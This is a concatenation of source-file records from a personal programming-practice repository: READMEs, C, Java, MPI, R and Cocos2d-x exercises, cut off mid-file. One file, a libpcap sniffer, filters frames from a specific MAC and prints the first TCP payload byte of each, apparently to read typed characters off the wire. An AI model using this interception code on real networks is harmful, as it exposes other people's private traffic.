执行C#程序时候,程序集被加载到CLR中,如果符合安全要求,则CLR执行实时(JIT)编译将IL代码转化为本机机器指令,CLR还提供自动垃圾回收,异常处理和资源管理有关的其他服务。\n\n## Structure\n```\n.\n├── docs //documents\n├── hardwork\n│   ├── hardway // practice code\n│   └── runoob // runoob practice code\n├── projects\n│   └── todolist // A simpile todolist\n└── README.md\n```\n\n## Naming Style\n\n+ Namespace : Pascal Case (also called `UpperCamelCase`).\n+ Classes and Structures : Pascal Case.\n+ Interfaces : Follow class naming conventions, but start the name with `I` and capitalize the letter following the `I`.\n+ Functions : Pascal Case.\n+ Properties and Public Member Variables : Pascal Case.\n+ Parameters and Procedure-level Variables : Camel Case (or `lowerCamelCase`).\n\n> + Pascal case: writing compound words or phrases such that the first letter of each concatenated word is capitalized.\n> + Camel case: writing compound words or phrases such that each word or abbreviation in the middle of the phrase begins with a capital letter. \n> + upper camel case (initial upper case letter, also known as Pascal Case).\n> + lower camel case (initial lower case letter).\n\n## Reference\n\n+ [Github dotnet core](https://github.com/dotnet/core)\n+ [Github dotnet csharp](https://github.com/dotnet/csharplang)\n+ [Github Microsoft dotnet](https://github.com/Microsoft/dotnet)\n+ [Wikipedia C#](https://zh.wikipedia.org/wiki/C%E2%99%AF)\n+ [MSDN C# 教程](https://msdn.microsoft.com/zh-cn/library/aa288463(v=vs.71).aspx)\n+ [RUNOOB C# 教程](http://www.runoob.com/csharp/csharp-tutorial.html)\n" }, { "alpha_fraction": 0.4677419364452362, "alphanum_fraction": 0.5, "avg_line_length": 30, "blob_id": "592c90a5bfc9dbc72c5e7428b1af98d23c5076c3", "content_id": "0d769b0dccd741e115baec7f07b4758e07aabfbd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 124, "license_type": "permissive", "max_line_length": 62, "num_lines": 4, "path": "/c/hardwork/hardway/GCD_short.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint GCD(int a, int b) { return (0 == b) ? a : GCD(b, a % b); }\nint main() { printf(\"%d\", GCD(5, 25)); }\n" }, { "alpha_fraction": 0.6679643988609314, "alphanum_fraction": 0.6763070225715637, "avg_line_length": 39.8636360168457, "blob_id": "7efee89c0e0f81a6ff73fc9fbb09838c593479d5", "content_id": "78bbfbf3a317154de702ad412110697a21bebe7a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2160, "license_type": "permissive", "max_line_length": 213, "num_lines": 44, "path": "/java/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Java-Study\n`jskzyero` `2017/12/31`\n\n## Overview\n+ Java是由Sun Microsystems公司于1995年5月推出的Java面向对象程序设计语言和Java平台的总称。\n + JDK(Java Development Kit):针对Java开发人员的软件开发包(SDK,Software delelopment kit),包括(javac、java、jar、javadoc)。\n + JRE(Java Runtime Environment):普通用户安装的版本,记得我们要装的是JDK。\n + Apache Ant:A Java library and command-line tool use to build Java application\n + 在学习的一开始推荐暂时不考虑使用IDE,因而上述基础环境是需要自己配置的,即便是Windows也只需要添加好Path就可以愉快开坑。\n+ ...\n\n## Structure\n```\n.\n├── docs // documents\n├── hardwork\n│   ├── ant // use ant to build code\n│   ├── hardway // practice code\n│   ├── helloworld // fisrt code to java\n│   ├── junit // junit unit test\n│   ├── swing // swing gui\n│   └── tips // some useful tips\n├── projects\n│   ├── gridworld // A grid world let you play with\n│   └── todolist // A simple todolist\n└── README.md\n```\n\n## Naming Style\n\n+ Common rules : only ASCII letters and digits, can matched by the regular expression `\\w+ `. special prefixes or suffixes, like those seen in the examples `name_`, `mName`, `s_name` and `kName`, are **not** used.\n\n\n+ Package names : `com.example.deepspace`, not `com.example.deepSpace` or `com.example.deep_space`.\n+ Class names : UpperCamelCase. `Character` or `ImmutableList`.\n+ Constant names : `CONSTANT_CASE`\n+ Method names, Non-constant field names, Parameter names, Local variable names : lowerCamelCase.\n+ Type variable names : A single capital letter, optionally followed by a single numeral (such as `E`, `T`, `X`, `T2`, examples: `RequestT`, `FooBarT`)\n\n## Reference\n\n+ [Java Tutorials Learning Paths](https://docs.oracle.com/javase/tutorial/tutorialLearningPaths.html)\n\n+ [Google Java Style Guide](https://google.github.io/styleguide/javaguide.html#s5-naming)\n" }, { "alpha_fraction": 0.532619297504425, "alphanum_fraction": 0.5472249388694763, "avg_line_length": 22.9069766998291, "blob_id": "d14153516b6a3d862ffc3b7253d2c955c21a91ce", "content_id": "04368fd1f79a03dcc5e76c864359b83411063d4a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1145, "license_type": "permissive", "max_line_length": 73, "num_lines": 43, "path": "/c/projects/MPI/hardway/MPI_gather.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 在一个进程中从所有进程获取信息,\n// 例如将所有进程中的一个数组都收集到根进程中作进一步的处理,这样的集合通信我们叫做收集。\n\n#include <mpi.h>\n#include <stdio.h>\n#include <stdlib.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs;\n int dest = 0;\n int array[5] = {1, 2, 3, 4, 5};\n int *rbuf;\n int i, j;\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n if (myid == dest) {\n rbuf = (int *)malloc(numprocs * 5 * sizeof(int));\n }\n\n // int MPI_Gather(void* sendbuf, int sendcount, MPI_Datatype sendtype, \n // void* recvbuf, int recvcount, MPI_Datatype recvtype, \n // int root, MPI_Comm comm)your code here\n MPI_Gather(array, 5, MPI_INT,\n rbuf, 5, MPI_INT,\n dest, MPI_COMM_WORLD);\n\n if (myid == dest) {\n for (i = dest + 1; i < numprocs; i++) {\n printf(\"Now is process %d's data: \", i);\n for (j = 0; j < 5; j++) {\n printf(\"array[%d]=%d\\t\", j, rbuf[i * 5 + j]);\n }\n printf(\"\\n\");\n }\n }\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.48138296604156494, "alphanum_fraction": 0.5239361524581909, "avg_line_length": 16.090909957885742, "blob_id": "5f80e5a67a51929daf38454b550857cd771a9177", "content_id": "04887dec89bef9abcc96b0067615600d48894158", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 376, "license_type": "permissive", "max_line_length": 42, "num_lines": 22, "path": "/c/hardwork/hardway/check_marks_state.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for scanf() printf()\n\n\nint check_marks_state(float n) {\n if (n < 60)\n return 0;\n else if (n < 70)\n return 1;\n else if (n < 80)\n return 2;\n else if (n < 90)\n return 3;\n else if (n > 90)\n return 4;\n}\nint main() {\n float n; // store the num\n while (scanf(\"%f\", &n) != EOF) {\n printf(\"%d\\n\", check_marks_state(n));\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.6405919790267944, "alphanum_fraction": 0.6744186282157898, "avg_line_length": 29.66666603088379, "blob_id": "84006e191d55b0e74a772fe5e4100c381947af9f", "content_id": "31073cb6f4e24e776e783f4a8f9e6ff0b3f32065", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 473, "license_type": "permissive", "max_line_length": 103, "num_lines": 15, "path": "/R/projects/Words_Analyzer/word_analyzer.R", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# install.packages(\"jiebaR\")\r\n# install.packages(\"sqldf\")\r\n# install.palckages(\"wordcloud2\")\r\nlibrary(jiebaR)\r\nlibrary(sqldf)\r\nlibrary(wordcloud2)\r\n\r\nf<-scan('D:/Desktop/test.txt',sep='\\n',what='',encoding=\"UTF-8\")\r\nseg<-qseg[f]\r\nseg<-seg[nchar(seg)>2]\r\nseg<-seg[nchar(seg)<17]\r\n# seg\r\nm1<-data.frame(seg)\r\nm2<-sqldf(\"select seg,count(1) as freg from m1 group by seg\")\r\nwordcloud2(m2, size = 0.5, minSize = 0, gridSize = 3,color = \"random-light\", backgroundColor = \"grey\")" }, { "alpha_fraction": 0.560859203338623, "alphanum_fraction": 0.577565610408783, "avg_line_length": 17.2608699798584, "blob_id": "4fe84b56514f29738c0c90741805502b42f35040", "content_id": "ad533455edd04857e8b0223dd3fa607e472bbfc1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 419, "license_type": "permissive", "max_line_length": 45, "num_lines": 23, "path": "/java/projects/algorithms/chapter1/part1/Q14.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/**\n * Q14\n */\n\nimport java.util.Scanner;\n\npublic class Q14 {\n public static void main(String[] args) {\n Scanner scanner = new Scanner(System.in);\n while (scanner.hasNextInt()) {\n int num = scanner.nextInt();\n System.out.println(lg(num));\n }\n scanner.close();\n }\n\n public static int lg(int num) {\n int result = 0;\n while ((1 << result) <= num)\n result++;\n return result - 1;\n }\n}" }, { "alpha_fraction": 0.2540540397167206, "alphanum_fraction": 0.3351351320743561, "avg_line_length": 21.42424201965332, "blob_id": "8ae3c8bed0f61fc53a8b836008a60e90a674aafa", "content_id": "0e04af0e414558d6a997aa75eb72a64ebf3c07d2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 740, "license_type": "permissive", "max_line_length": 76, "num_lines": 33, "path": "/c/hardwork/hardway/4.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\nint n[5][1005];\nint num[1005];\nfloat n5[1005];\n\nint main() {\n int N, i, j, _n5, _num;\n scanf(\"%d\", &N);\n for (i = 1; i <= N; i++) {\n scanf(\"%d %d %d %d\", &n[0][i], &n[1][i], &n[2][i], &n[3][i]);\n n[4][i] = n[1][i] + n[2][i] + n[3][i];\n n5[i] = n[4][i] - n[0][i] / 1000000;\n num[i] = n[0][i];\n }\n for (i = 1; i <= N - 1; i++) {\n for (j = 1; j <= N - 1; j++) {\n if (n5[j] < n5[j + 1]) {\n _n5 = n5[j];\n n5[j] = n5[j + 1];\n n5[j + 1] = _n5;\n _num = num[j];\n num[j] = num[j + 1];\n num[j + 1] = _num;\n }\n }\n }\n for (i = 1; i <= 5; i++) {\n j = num[i];\n printf(\"%d %d %d %d %d\\n\", n[0][j], n[1][j], n[2][j], n[3][j], n[4][j]);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.5951478481292725, "alphanum_fraction": 0.603487491607666, "avg_line_length": 40.05836486816406, "blob_id": "de95630e4ccaa159f8b058fd4466743bb802c0d9", "content_id": "038ba74a76dba03b1a9c38f7d03542ba0d640000", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 10552, "license_type": "permissive", "max_line_length": 83, "num_lines": 257, "path": "/c/projects/sniff/main.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/* meat of the code is in here so read this file */\n\n#include <buffer.h>\n#include <capture.h>\n\n#include <netinet/in.h>\n#include <sys/types.h>\n#include <time.h>\n#include <unistd.h>\n\ntypedef struct iphdr ip_header;\ntypedef struct ether_header ethernet_header;\n\nint main(int argc, char **argv) {\n /* variables for network device */\n char *dev; /* pointer to network card name, like a file name */\n char errbuf[PCAP_ERRBUF_SIZE]; /* buffer for pcap to send its errors */\n pcap_t *descr; /* file descriptor for the network card */\n\n /* variables for packets we sniff */\n // ethernet_header\n // *eptr; /* pointer to the structure that represents ethernet header */\n // ip_header *ipptr; /* pointer to the structure that represents ip header */\n // unsigned int size_of_iphdr = sizeof(ip_header); /* size of the ip header */\n // unsigned int size_of_ehdr =\n // sizeof(ethernet_header); /* size of the ethernet header */\n\n /* variables for the simple buffer, ignore them */\n buffer buf; /* that's my linked-list */\n item *tmp; /* an item in the linked-list */\n // u_char *ptr, *packet; /* vars to store raw packets */\n // register int i = 0;\n // struct in_addr ipaddr; /* you should know this one */\n\n /* simple sanity check to make sure that the application is used properly */\n if (argc != 2) {\n fprintf(stderr,\n \"Usage: %s no_packets\\nno_packets: number of packets to grab \"\n \"before quit sniffing\\n\",\n argv[0]);\n exit(-1);\n }\n\n /* remember, everything in unix is a file? so is a network card.\n * so all we have to do to sniff is:\n * 1) locate the network card to sniff (like locating a file see glob())\n * 2) open the network card for sniffing (like opening a file for reading see\n * open()) 3) read the network card (like reading a file see read()) and we\n * are done!\n */\n\n /* step-1: locating the network card\n * dev is NULL if it cannot locate a network card, so we simply display\n * the error message and quit. notice how we are using errbuf, wherever\n * there is an error pcap fills it up with appropriate error message and\n * all we need to do is print it out!\n */\n if ((dev = pcap_lookupdev(errbuf)) == NULL) {\n fprintf(stderr, \"%s: pcap_lookupdev: %s\\n\", argv[0], errbuf);\n exit(-1);\n }\n\n /* step-2: open the network card to sniff\n * now that we know the name of the network card we open it here so that we\n * can start sniffing. let me go through the parameters, but don't forget to\n * do a man on pcap, i.e. type \"man pcap\" to learn more about these functions.\n * about the parameters:\n * 0) first parameter is the device name which we obtain in step-1, see above\n * 1) second parameter is the maximum size of the packets pcap should pick up\n * that is if you send 512 then pcap will only return the first 512 bytes\n * of any packet longer than 512 bytes. BUFSIZ is a default value defined in\n * pcap.h 2) third parameter is 0 if we want the card to be in promiscuous\n * mode, 1 otherwise. see the lectures on sniffers to learn more about\n * promiscuous mode 3) fourth is a time out value for read, if we set it to\n * -1 subsequent read function, we will talk about it next, will return one\n * packet at a time but if we set it to some value > 0 then it will collect\n * as many packets as it can in specified time of milli seconds and return\n * all those packets. 4) last parameter is a buffer for the function to\n * return error messages\n */\n if ((descr = pcap_open_live(dev, BUFSIZ, 0, -1, errbuf)) == NULL) {\n fprintf(stderr, \"%s: pcap_open_live: %s\\n\", argv[0], errbuf);\n exit(-1);\n }\n\n /* since we need to be privileged mode to put the card in promiscuous mode\n * once we are done with that we should reset the gid and uid recall your\n * secure programming lectures\n */\n (void)setgid(getgid());\n (void)setuid(getuid());\n\n /* this is where i dropped a packet of Hershey's Bites on the floor */\n /* don't read too much into above sentence, i may have actually dropped\n * a pack of Hershey's on the floor :-)\n */\n\n /* so, i'm preparing a linked-list to store the packets i sniff */\n create_buffer(&buf, 4096, 2048);\n\n /* hokey dokey, so we are now ready to sniff the wire! */\n /* step-3: read the network card (sniff in short!)\n * those who are not familiar with the concept of callback functions it\n * may look perplexing to pass a function as argument to another function\n * but that's how callback functions work. we will get to that soon.\n * about parameters:\n * 0) file descriptor of the network card so that the function can read it\n * 1) number of packets to sniff before this function stops, so in our case\n * we simply give it the first command line argument to our program. (try\n * running the program with -1) when this argument is -1 the function loops\n * forever! 2) third parameter is a pointer to the callback function. so,\n * whenever pcap_loop reads a packet off the wire it calls the function\n * pointed to by this pointer with the next argument as the first argument\n * to the callback function. so, if you start the program with -1 then this\n * program will gather packets for ever and store them in the linked-list\n * until the machine runs out of memory!! 3) fourth parameter is the\n * argument to the callback function, since we have to supply a pointer to the\n * linked-list in the pcap_callback for append_item we pass it as the\n * parameter here so we can use it back there. clear?\n *\n * pcap_loop returns numbers of packets captured, so i'm just printing it out.\n */\n pcap_loop(descr, atoi(argv[1]), pcap_callback, (void *)&buf);\n\n /* sniffing is all done, at this point we have some packets in the linked-list\n * so lets go through the list and print some information about our captives\n */\n\n fprintf(stdout, \"\\nDetail information about captured packets\\n\");\n /* just walk the list one item at a time and print some info about the packet\n */\n tmp = buf.header;\n while (tmp != NULL) {\n if (tmp->full_packet[6] != (u_char)(0x4c) ||\n tmp->full_packet[7] != (u_char)(0x0b)) {\n tmp = tmp->next;\n continue;\n }\n\n // fprintf(stdout, \"actual length=%d captured length=%d\\n\",\n // tmp->packet_header->len, tmp->packet_header->caplen);\n\n if (tmp->full_packet[0x2e] == (u_char)0x50 && \n tmp->full_packet[0x2f] == (u_char)0x18) {\n // fprintf(stdout, \"%02x \", tmp->full_packet[0x36]);\n fprintf(stdout, \"%c \", tmp->full_packet[0x36]);\n }\n // for (int i = 0; i < tmp->packet_header->caplen; i++)\n // fprintf(stdout, \"%02x%c\", (unsigned int)(tmp->full_packet[i]),\n // (i + 1) % 16 == 0 ? '\\n' : ' ');\n\n // fprintf(stdout, \"\\n\\n\");\n\n /* here we want to access the ethernet header of a packet, which looks like\n * this\n * ------------------------------------------\n * | ethernet | ip | icmp/tcp | payload |\n * | header | header | header | |\n * ------------------------------------------\n * since we are interested in the ethernet header we do a simple type cast\n * and it gives us a right amount of bytes, that is, it'll automatically\n * ignore everything beyond ethernet header\n */\n\n // packet = tmp->full_packet;\n // eptr = (ethernet_header *)packet; /* ethernet header of current packet */\n\n // /* print the source and destination from the ethernet frame */\n // ptr = eptr->ether_dhost;\n // i = ETHER_ADDR_LEN;\n // fprintf(stdout, \"\\ndestination mac address= \");\n // do {\n // fprintf(stdout, \"%s%x\", (i == ETHER_ADDR_LEN) ? \" \" : \":\", *ptr++);\n // } while (--i > 0);\n // fprintf(stdout, \"\\n\");\n\n // ptr = eptr->ether_shost;\n // i = ETHER_ADDR_LEN;\n // fprintf(stdout, \"source mac address=\");\n // do {\n // fprintf(stdout, \"%s%x\", (i == ETHER_ADDR_LEN) ? \" \" : \":\", *ptr++);\n // } while (--i > 0);\n // fprintf(stdout, \"\\n\\n\\n\");\n\n // fprintf(stdout, \"type of packet= \");\n\n // /* what is the type of packet, that is, is it an IP packet inside or is\n // it\n // * arp etc. */\n\n // switch (ntohs(eptr->ether_type)) {\n // case (ETHERTYPE_IP):\n // fprintf(stdout, \"IP\\n\");\n\n // /* now that we know this is an ip packet, lets examine its headers\n // * ip header starts right after ethernet header, that's why we add\n // * the size of ethernet header before type casting the content\n // */\n // ipptr = (ip_header *)(packet + size_of_ehdr);\n\n // /* lets first check if we have a ip packet of valid length, if we\n // don't\n // * do this check the following instructions may lead to a buffer\n // * overflow in our sniffer, cs392 gang take notes\n // */\n\n // if ((tmp->packet_header->len - size_of_ehdr) < size_of_iphdr) {\n // fprintf(stderr, \"not a valid IP packet\\n\");\n // continue;\n // }\n\n // /* we have a valid ip packet, so lets print out its fields */\n // fprintf(stdout, \"information about this IP packet:\\n\");\n // fprintf(stdout, \"length= %d\\n\", ntohs(ipptr->tot_len));\n // fprintf(stdout, \"header length= %d\\n\", ipptr->ihl);\n // fprintf(stdout, \"version= %d\\n\", ipptr->version);\n // fprintf(stdout, \"id= %d\\n\", ipptr->id);\n // fprintf(stdout, \"offset= %d\\n\", ipptr->frag_off);\n // fprintf(stdout, \"ttl= %d\\n\", ipptr->ttl);\n // fprintf(stdout, \"protocol=%d\\n\", ipptr->protocol);\n\n // ipaddr.s_addr = (unsigned long int)ipptr->saddr;\n // fprintf(stdout, \"source= %s\\n\", inet_ntoa(ipaddr)); /* source address\n // */\n\n // ipaddr.s_addr = (unsigned long int)ipptr->daddr;\n // fprintf(stdout, \"destination= %s\\n\", inet_ntoa(ipaddr));\n // /* and so on, you got the idea */\n // break;\n\n // case (ETHERTYPE_ARP):\n // fprintf(stdout, \"ARP\\n\");\n // break;\n\n // case (ETHERTYPE_REVARP):\n // fprintf(stdout, \"RARP\\n\");\n // break;\n\n // case (ETHERTYPE_PUP):c\n // fprintf(stdout, \"Xerox PUP\\n\");\n // break;\n\n // default:\n // fprintf(stdout, \"Unknown type (%x)\\n\", ntohs(eptr->ether_type));\n // break;\n // }\n\n // fprintf(stdout,\n // \"\\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\"\n // \"++++++++++\\n\\n\");\n\n /* next packet please */\n tmp = tmp->next;\n }\n\n return 0;\n}\n" }, { "alpha_fraction": 0.6315789222717285, "alphanum_fraction": 0.6401137709617615, "avg_line_length": 19.114286422729492, "blob_id": "8c4be59e8fd49c74be32c2ef4ea62d2c35d38a5f", "content_id": "e536dd08d15123494f876e7225d69faac90fcf0f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 835, "license_type": "permissive", "max_line_length": 75, "num_lines": 35, "path": "/c/projects/MPI/hardway/MPI_group_free.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 既然有了组的构造,那么与之对应也存在组的析构。\n\n#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs;\n MPI_Group group_world;\n int size0;\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n MPI_Comm_group(MPI_COMM_WORLD, &group_world);\n\n MPI_Group_size(group_world, &size0);\n\n if (myid == 0) {\n printf(\"Now the size is %d\\n\", size0);\n }\n\n // int MPI_Group_free(MPI_Group *group)\n // 调用函数会标记一个被释放的组对象,组句柄被调用置为MPI_GROUP_NULL。\n // 任何正在使用此组的操作将正常完成。\n MPI_Group_free(&group_world);\n\n if (myid == 0) {\n if (group_world == MPI_GROUP_NULL) printf(\"Now the group is freed.\\n\");\n }\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.4268774688243866, "alphanum_fraction": 0.4308300316333771, "avg_line_length": 13.05555534362793, "blob_id": "e1c6c66e8da9207532aafc4240c1a1d38fe66ea4", "content_id": "46ac77798b3920955b9e60ce277e1a50ce689bf2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 278, "license_type": "permissive", "max_line_length": 42, "num_lines": 18, "path": "/c/hardwork/hardway/swap_two_num.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for scanf() printf()\n\nvoid swap(int *i, int *j) {\n int temp;\n temp = *i;\n *i = *j;\n *j = temp;\n}\n\nint main() {\n int a, b;\n\n scanf(\"%d%d\", &a, &b);\n swap(&a, &b); // ����a��b������ֵ\n printf(\"%d %d\\n\", a, b);\n\n return 0;\n}\n" }, { "alpha_fraction": 0.5381583571434021, "alphanum_fraction": 0.559376060962677, "avg_line_length": 39.83561706542969, "blob_id": "2316cff68631dc2e631b711862d71d457ba75b04", "content_id": "c0a2b18d6a5a72afaed0236bfb9da44e947b907b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 12420, "license_type": "permissive", "max_line_length": 132, "num_lines": 292, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/week12/Classes/HelloWorldScene.cpp", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include \"HelloWorldScene.h\"\n#pragma execution_character_set(\"utf-8\")\nUSING_NS_CC;\n\nScene* HelloWorld::createScene()\n{\n // 'scene' is an autorelease object\n auto scene = Scene::create();\n\n // 'layer' is an autorelease object\n auto layer = HelloWorld::create();\n\n // add layer as a child to scene\n scene->addChild(layer);\n\n // return the scene\n return scene;\n}\n\n// on \"init\" you need to initialize your instance\nbool HelloWorld::init()\n{\n //////////////////////////////\n // 1. super init first\n if ( !Layer::init() )\n {\n return false;\n }\n\n haveAction = false;\n dtime = 180;\n \n visibleSize = Director::getInstance()->getVisibleSize();\n origin = Director::getInstance()->getVisibleOrigin();\n rect = Rect(0, 0, visibleSize.width, visibleSize.height);\n schedule(schedule_selector(HelloWorld::updateTime), 1.0f, dtime, 0);\n \n\n \n //////////////////////////////\n // 2. add nodes\n \n // 界面所有字体要求:使用fonts目录下的arial.ttf,字体大小为36\n TTFConfig fontConfig;\n fontConfig.fontFilePath = \"fonts/arial.ttf\";\n fontConfig.fontSize = 32;\n \n // 添加倒计时\n time = Label::createWithTTF(fontConfig, \"18\");\n time->setPosition(visibleSize.width / 2,\n visibleSize.height - time->getContentSize().height / 2);\n time->setName(\"time\");\n this->addChild(time, 1);\n \n\n \n \n auto texture = Director::getInstance()->getTextureCache()->addImage(\"$lucia_2.png\");\n\t//从贴图中以像素单位切割,创建关键帧\n\tauto frame0 = SpriteFrame::createWithTexture(texture, CC_RECT_PIXELS_TO_POINTS(Rect(0, 0, 113, 113)));\n\t//使用第一帧创建精灵\n\tplayer = Sprite::createWithSpriteFrame(frame0);\n\tplayer->setPosition(Vec2(origin.x + visibleSize.width / 2,\n\t\t\t\t\t\t\torigin.y + visibleSize.height/2));\n player->setName(\"player\");\n\taddChild(player, 3);\n\n // 添加人物血条\n\t//hp条\n\tSprite* sp0 = Sprite::create(\"hp.png\", CC_RECT_PIXELS_TO_POINTS(Rect(0, 320, 420, 47)));\n\tSprite* sp = Sprite::create(\"hp.png\", CC_RECT_PIXELS_TO_POINTS(Rect(610, 362, 4, 16)));\n\n\t//使用hp条设置progressBar\n\tpT = ProgressTimer::create(sp);\n\tpT->setScaleX(90);\n\tpT->setAnchorPoint(Vec2(0, 0));\n\tpT->setType(ProgressTimerType::BAR);\n\tpT->setBarChangeRate(Point(1, 0));\n\tpT->setMidpoint(Point(0, 1));\n\tpT->setPercentage(100);\n\tpT->setPosition(Vec2(origin.x+14*pT->getContentSize().width,origin.y + visibleSize.height - 2*pT->getContentSize().height));\n\taddChild(pT,1);\n\tsp0->setAnchorPoint(Vec2(0, 0));\n\tsp0->setPosition(Vec2(origin.x + pT->getContentSize().width, origin.y + visibleSize.height - sp0->getContentSize().height));\n\taddChild(sp0,0);\n\n \n\t// 静态动画\n\tidle.reserve(1);\n\tidle.pushBack(frame0);\n\n\t// 攻击动画\n\tattack.reserve(17);\n\tfor (int i = 0; i < 17; i++) {\n\t\tauto frame = SpriteFrame::createWithTexture(texture, CC_RECT_PIXELS_TO_POINTS(Rect(113*i,0,113,113)));\n\t\tattack.pushBack(frame);\n\t}\n\n\t// 可以仿照攻击动画\n\t// 死亡动画(帧数:22帧,高:90,宽:79)\n\tauto texture2 = Director::getInstance()->getTextureCache()->addImage(\"$lucia_dead.png\");\n for (int i = 0; i < 22; i++) {\n auto frame = SpriteFrame::createWithTexture(texture2, CC_RECT_PIXELS_TO_POINTS(Rect(79*i,0,79,90)));\n dead.pushBack(frame);\n }\n \n\t// 运动动画(帧数:8帧,高:101,宽:68)\n\tauto texture3 = Director::getInstance()->getTextureCache()->addImage(\"$lucia_forward.png\");\n for (int i = 0; i < 8; i++) {\n auto frame = SpriteFrame::createWithTexture(texture3, CC_RECT_PIXELS_TO_POINTS(Rect(68*i,0,68,101)));\n run.pushBack(frame);\n }\n \n\n auto wLabel = Label::createWithTTF(fontConfig, \"W\");\n auto aLabel = Label::createWithTTF(fontConfig, \"A\");\n auto sLabel = Label::createWithTTF(fontConfig, \"S\");\n auto dLabel = Label::createWithTTF(fontConfig, \"D\");\n auto xLabel = Label::createWithTTF(fontConfig, \"X\");\n auto yLabel = Label::createWithTTF(fontConfig, \"Y\");\n \n \n // 左边wasd4个虚拟按键能控制角色移动\n // auto wButton = MenuItemLabel::create(wLabel, CC_CALLBACK_0(HelloWorld::wButtomClickCallback, this, timer));\n auto wButton = MenuItemLabel::create(wLabel, [&](Ref * sender) {\n if (!haveAction) {\n auto vec = Vec2(0, 50);\n Vec2 position = player->getPosition();\n // 角色不会移动到可视窗口外 下同\n if (rect.containsPoint(position + vec)) {\n auto moveBy = MoveBy::create(0.8f, vec);\n auto action = Spawn::createWithTwoActions(moveBy, Animate::create(Animation::createWithSpriteFrames(run, 0.1f)));\n auto seq = Sequence::create(\n CallFunc::create(this, callfunc_selector(HelloWorld::actionBegin)),\n action,\n CallFunc::create(this, callfunc_selector(HelloWorld::actionFinishedCallback)),\n NULL);\n player->runAction(seq);\n }\n }\n });\n \n auto aButton = MenuItemLabel::create(aLabel, [&](Ref * sender) {\n if (!haveAction) {\n auto vec = Vec2(-50, 0);\n Vec2 position = player->getPosition();\n if (rect.containsPoint(position + vec)) {\n auto moveBy = MoveBy::create(0.8f, vec);\n auto action = Spawn::createWithTwoActions(moveBy, Animate::create(Animation::createWithSpriteFrames(run, 0.1f)));\n auto seq = Sequence::create(\n CallFunc::create(this, callfunc_selector(HelloWorld::actionBegin)),\n action,\n CallFunc::create(this, callfunc_selector(HelloWorld::actionFinishedCallback)),\n NULL);\n player->runAction(seq);\n }\n }\n });\n \n auto sButton = MenuItemLabel::create(sLabel, [&](Ref * sender) {\n if (!haveAction) {\n auto vec = Vec2(0, -50);\n Vec2 position = player->getPosition();\n if (rect.containsPoint(position + vec)) {\n auto moveBy = MoveBy::create(0.8f, vec);\n auto action = Spawn::createWithTwoActions(moveBy, Animate::create(Animation::createWithSpriteFrames(run, 0.1f)));\n auto seq = Sequence::create(\n CallFunc::create(this, callfunc_selector(HelloWorld::actionBegin)),\n action,\n CallFunc::create(this, callfunc_selector(HelloWorld::actionFinishedCallback)),\n NULL);\n player->runAction(seq);\n }\n }\n });\n \n auto dButton = MenuItemLabel::create(dLabel, [&](Ref * sender) {\n if (!haveAction) {\n auto vec = Vec2(50, 0);\n Vec2 position = player->getPosition();\n if (rect.containsPoint(position + vec)) {\n auto moveBy = MoveBy::create(0.8f, vec);\n auto action = Spawn::createWithTwoActions(moveBy, Animate::create(Animation::createWithSpriteFrames(run, 0.1f)));\n auto seq = Sequence::create(\n CallFunc::create(this, callfunc_selector(HelloWorld::actionBegin)),\n action,\n CallFunc::create(this, callfunc_selector(HelloWorld::actionFinishedCallback)),\n NULL);\n player->runAction(seq);\n }\n }\n });\n // 右边2个虚拟按键x,y能控制角色播放不同的帧动画\n auto xButton = MenuItemLabel::create(xLabel, [&](Ref * sender) {\n if (!haveAction) {\n auto vec = Vec2(0, 0);\n Vec2 position = player->getPosition();\n if (rect.containsPoint(position + vec)) {\n auto moveBy = MoveBy::create(0.8f, vec);\n auto action = Spawn::createWithTwoActions(moveBy, Animate::create(Animation::createWithSpriteFrames(attack, 0.1f)));\n auto seq = Sequence::create(\n CallFunc::create(this, callfunc_selector(HelloWorld::actionBegin)),\n action,\n Animate::create(Animation::createWithSpriteFrames(idle, 